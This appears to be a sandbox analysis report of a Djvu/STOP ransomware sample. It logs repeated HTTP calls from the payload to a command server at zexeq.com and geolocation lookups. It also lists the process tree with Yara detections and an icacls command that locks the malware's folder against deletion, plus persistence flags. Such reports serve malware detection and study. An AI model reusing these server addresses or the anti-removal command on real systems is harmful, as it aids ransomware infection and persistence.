                                                                                                                          Jan 16, 2024 00:41:09.121315002 CET137OUTGET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1
                                                                                                                          User-Agent: Microsoft Internet Explorer
                                                                                                                          Host: zexeq.com
                                                                                                                          Jan 16, 2024 00:41:09.791928053 CET137OUTGET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1
                                                                                                                          User-Agent: Microsoft Internet Explorer
                                                                                                                          Host: zexeq.com


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          3192.168.2.449736175.119.10.231807620C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 16, 2024 00:41:09.184797049 CET126OUTGET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1
                                                                                                                          User-Agent: Microsoft Internet Explorer
                                                                                                                          Host: zexeq.com


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          4192.168.2.449737175.119.10.231807620C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 16, 2024 00:41:15.342257977 CET126OUTGET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1
                                                                                                                          User-Agent: Microsoft Internet Explorer
                                                                                                                          Host: zexeq.com


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          5192.168.2.449738175.119.10.231807568C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 16, 2024 00:41:15.419260979 CET137OUTGET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1
                                                                                                                          User-Agent: Microsoft Internet Explorer
                                                                                                                          Host: zexeq.com


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          6192.168.2.449746175.119.10.231807620C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 16, 2024 00:41:20.984824896 CET126OUTGET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1
                                                                                                                          User-Agent: Microsoft Internet Explorer
                                                                                                                          Host: zexeq.com


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          7192.168.2.449747175.119.10.231807568C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 16, 2024 00:41:21.086894989 CET137OUTGET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1
                                                                                                                          User-Agent: Microsoft Internet Explorer
                                                                                                                          Host: zexeq.com


                                                                                                                          HTTPS Proxied Packets

                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.2.449729172.67.139.2204437476C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-01-15 23:40:58 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                                          User-Agent: Microsoft Internet Explorer
                                                                                                                          Host: api.2ip.ua
                                                                                                                          2024-01-15 23:40:58 UTC891INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 15 Jan 2024 23:40:58 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          strict-transport-security: max-age=63072000; preload
                                                                                                                          x-frame-options: SAMEORIGIN
                                                                                                                          x-content-type-options: nosniff
                                                                                                                          x-xss-protection: 1; mode=block; report=...
                                                                                                                          access-control-allow-origin: *
                                                                                                                          access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                          access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2T%2Bl36zn4%2BscfIepXqGkbRm75GUG3d483ifIfTX10QH2pYRB1A30kEnHGuVIiox54XJHE%2FDVGkL9WKOz4reIqViQCxnc%2BBwSKg4ajB2HsS1EXQVgS64wtkMsJ8YN"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8461f78109985908-IAD
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-01-15 23:40:58 UTC433INData Raw: 31 61 61 0d 0a 7b 22 69 70 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 32 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 44 69 73 74 72 69 63 74 20 6f 66 20 63 6f 6c 75 6d 62 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 34 38 5c 75 30 34 33 38 5c 75 30 34 33 64 5c 75 30 34 33 33 5c 75 30 34 34 32 5c 75 30 34 33 65 5c 75 30 34 33 64 22 2c
                                                                                                                          Data Ascii: 1aa{"ip":"102.165.48.42","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"District of columbia","region_rus":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d",
                                                                                                                          2024-01-15 23:40:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          1192.168.2.449730172.67.139.2204437568C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-01-15 23:41:00 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                                          User-Agent: Microsoft Internet Explorer
                                                                                                                          Host: api.2ip.ua
                                                                                                                          2024-01-15 23:41:00 UTC887INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 15 Jan 2024 23:41:00 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          strict-transport-security: max-age=63072000; preload
                                                                                                                          x-frame-options: SAMEORIGIN
                                                                                                                          x-content-type-options: nosniff
                                                                                                                          x-xss-protection: 1; mode=block; report=...
                                                                                                                          access-control-allow-origin: *
                                                                                                                          access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                          access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=x1PB7KreZRQ6oPALKTRUmnvxps4X7Vq3NFXj2MfHl7O35Ttf98ZlOb3l0MkUSzXPFUnLnbjfUHoHh3TK4e3G%2BC9sooaV09n1lmwUfe027AhGAH1qr9xZzq1WmzB%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8461f78cbbde69ff-IAD
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-01-15 23:41:00 UTC433INData Raw: 31 61 61 0d 0a 7b 22 69 70 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 32 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 44 69 73 74 72 69 63 74 20 6f 66 20 63 6f 6c 75 6d 62 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 34 38 5c 75 30 34 33 38 5c 75 30 34 33 64 5c 75 30 34 33 33 5c 75 30 34 34 32 5c 75 30 34 33 65 5c 75 30 34 33 64 22 2c
                                                                                                                          Data Ascii: 1aa{"ip":"102.165.48.42","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"District of columbia","region_rus":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d",
                                                                                                                          2024-01-15 23:41:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          2192.168.2.449731172.67.139.2204437620C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-01-15 23:41:00 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                                          User-Agent: Microsoft Internet Explorer
                                                                                                                          Host: api.2ip.ua
                                                                                                                          2024-01-15 23:41:01 UTC891INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 15 Jan 2024 23:41:01 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          strict-transport-security: max-age=63072000; preload
                                                                                                                          x-frame-options: SAMEORIGIN
                                                                                                                          x-content-type-options: nosniff
                                                                                                                          x-xss-protection: 1; mode=block; report=...
                                                                                                                          access-control-allow-origin: *
                                                                                                                          access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                          access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JIKrkqa6W2%2F9RGpAzMBY%2BJGG6wWzc%2BM6yJSNuvY6kEGUxAFqPwrNDwJgW0D3kGfHPd2TFPZCsfNCoqgB4B%2FKcvtToRjgSerpCcFsKTa4tCRRY06Q7YxlYu07gobH"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8461f79238a32027-IAD
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-01-15 23:41:01 UTC433INData Raw: 31 61 61 0d 0a 7b 22 69 70 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 32 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 44 69 73 74 72 69 63 74 20 6f 66 20 63 6f 6c 75 6d 62 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 34 38 5c 75 30 34 33 38 5c 75 30 34 33 64 5c 75 30 34 33 33 5c 75 30 34 34 32 5c 75 30 34 33 65 5c 75 30 34 33 64 22 2c
                                                                                                                          Data Ascii: 1aa{"ip":"102.165.48.42","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"District of columbia","region_rus":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d",
                                                                                                                          2024-01-15 23:41:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          3192.168.2.449734172.67.139.2204437708C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-01-15 23:41:08 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                                          User-Agent: Microsoft Internet Explorer
                                                                                                                          Host: api.2ip.ua
                                                                                                                          2024-01-15 23:41:08 UTC889INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 15 Jan 2024 23:41:08 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          strict-transport-security: max-age=63072000; preload
                                                                                                                          x-frame-options: SAMEORIGIN
                                                                                                                          x-content-type-options: nosniff
                                                                                                                          x-xss-protection: 1; mode=block; report=...
                                                                                                                          access-control-allow-origin: *
                                                                                                                          access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                          access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xahW5m4yZo4K%2BXrFjHgqUGg6hUnNPaY6wJh8wzdQYaE7qtg5zedLBkIZHsk1aPCa4rcQHCGl%2Fq2KmV9ASDzpMXZswHs8O2hj5pfx%2FSDdjzCRv5Z6mHUjMeQHCIbk"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8461f7be6ae97f9a-IAD
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-01-15 23:41:08 UTC433INData Raw: 31 61 61 0d 0a 7b 22 69 70 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 32 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 44 69 73 74 72 69 63 74 20 6f 66 20 63 6f 6c 75 6d 62 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 34 38 5c 75 30 34 33 38 5c 75 30 34 33 64 5c 75 30 34 33 33 5c 75 30 34 34 32 5c 75 30 34 33 65 5c 75 30 34 33 64 22 2c
                                                                                                                          Data Ascii: 1aa{"ip":"102.165.48.42","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"District of columbia","region_rus":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d",
                                                                                                                          2024-01-15 23:41:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          4192.168.2.449739172.67.139.2204437868C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-01-15 23:41:16 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                                          User-Agent: Microsoft Internet Explorer
                                                                                                                          Host: api.2ip.ua
                                                                                                                          2024-01-15 23:41:16 UTC887INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 15 Jan 2024 23:41:16 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          strict-transport-security: max-age=63072000; preload
                                                                                                                          x-frame-options: SAMEORIGIN
                                                                                                                          x-content-type-options: nosniff
                                                                                                                          x-xss-protection: 1; mode=block; report=...
                                                                                                                          access-control-allow-origin: *
                                                                                                                          access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                          access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=k%2F1k3LCyOF7OdPJwSfePkwyc6uWJPApleBmD7LE7Q09bPvKLOSz2x6DauSJvNlkOuIQwKZqm0l4HgJl5Fh3JHf%2BLiG9LUMvmNO55ttDAE6QrryI9tNyX2TVlPvZJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8461f7f23dc39c82-IAD
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-01-15 23:41:16 UTC433INData Raw: 31 61 61 0d 0a 7b 22 69 70 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 32 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 44 69 73 74 72 69 63 74 20 6f 66 20 63 6f 6c 75 6d 62 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 34 38 5c 75 30 34 33 38 5c 75 30 34 33 64 5c 75 30 34 33 33 5c 75 30 34 34 32 5c 75 30 34 33 65 5c 75 30 34 33 64 22 2c
                                                                                                                          Data Ascii: 1aa{"ip":"102.165.48.42","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"District of columbia","region_rus":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d",
                                                                                                                          2024-01-15 23:41:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Statistics

                                                                                                                          CPU Usage

                                                                                                                          Click to jump to process

                                                                                                                          Memory Usage

                                                                                                                          Click to jump to process

                                                                                                                          High Level Behavior Distribution

                                                                                                                          Click to dive into process behavior distribution

                                                                                                                          Behavior

                                                                                                                          Click to jump to process

                                                                                                                          System Behavior

                                                                                                                          General

                                                                                                                          Target ID:0
                                                                                                                          Start time:00:40:56
                                                                                                                          Start date:16/01/2024
                                                                                                                          Path:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          Imagebase:0x460000
                                                                                                                          File size:1'150'976 bytes
                                                                                                                          MD5 hash:DE93E8A0692DB2C2F178270B8DA7B5D7
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000000.1646178008.000000000052C000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000000.1646178008.000000000052C000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000003.1658712318.0000000003271000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000003.1658712318.0000000003271000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000000.1646052396.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:1
                                                                                                                          Start time:00:40:58
                                                                                                                          Start date:16/01/2024
                                                                                                                          Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:icacls "C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                          Imagebase:0xe90000
                                                                                                                          File size:29'696 bytes
                                                                                                                          MD5 hash:2E49585E4E08565F52090B144062F97E
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:2
                                                                                                                          Start time:00:40:58
                                                                                                                          Start date:16/01/2024
                                                                                                                          Path:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                          Imagebase:0x460000
                                                                                                                          File size:1'150'976 bytes
                                                                                                                          MD5 hash:DE93E8A0692DB2C2F178270B8DA7B5D7
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000000.1664627925.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000000.1664775238.000000000052C000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000000.1664775238.000000000052C000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:3
                                                                                                                          Start time:00:40:59
                                                                                                                          Start date:16/01/2024
                                                                                                                          Path:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe --Task
                                                                                                                          Imagebase:0xe30000
                                                                                                                          File size:1'150'976 bytes
                                                                                                                          MD5 hash:DE93E8A0692DB2C2F178270B8DA7B5D7
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000003.00000000.1671969796.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000003.00000000.1672060797.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000003.00000000.1672060797.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Author: Joe Security
                                                                                                                          • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Author: unknown
                                                                                                                          • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, Author: ditekSHen
                                                                                                                          Reputation:low
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:4
                                                                                                                          Start time:00:41:06
                                                                                                                          Start date:16/01/2024
                                                                                                                          Path:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe" --AutoStart
